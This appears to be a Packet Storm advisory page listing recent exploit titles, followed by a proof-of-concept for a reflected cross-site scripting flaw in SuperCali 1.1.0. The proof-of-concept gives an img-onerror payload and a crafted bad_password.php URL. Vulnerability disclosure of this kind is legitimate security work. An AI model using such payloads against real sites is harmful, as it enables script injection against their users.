Grav CMS 1.7.44 Server-Side Template Injection

Ruby-SAML / GitLab Authentication Bypass

iTunes For Windows 12.13.2.3 Local Privilege Escalation

ABB Cylon Aspect 3.08.00 syslogSwitch.php Remote Code Execution

ABB Cylon Aspect 3.08.01 caldavUtil.php Remote Code Execution

SuperCali version 1.1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: SuperCali Version : 1.1.0 - Reflected XSS# Date: 2024-23-02# Exploit Author: tmrswrr# Vendor Homepage: https://supercali.inforest.com# Version : 1.1.0# Tested on: https://softaculous.com/demos/supercali1 ) Go to admin login url :  https://127.0.0.1/SuperCali/login.php2 ) Write your payload admin place : "><img src=x onerrora=confirm() onerror=confirm(1)>3 ) AFter click login will you see alert button : https://127.0.0.1/SuperCali/bad_password.php?email=\%22%3E%3Cimg%20src=x%20onerrora=confirm()%20onerror=confirm(1)%3E&return_to=127.0.0.1/&o=4&c=1&m=02&a=22&y=2024&w=1

Headline

SuperCali 1.1.0 Cross Site Scripting

Packet Storm: Latest News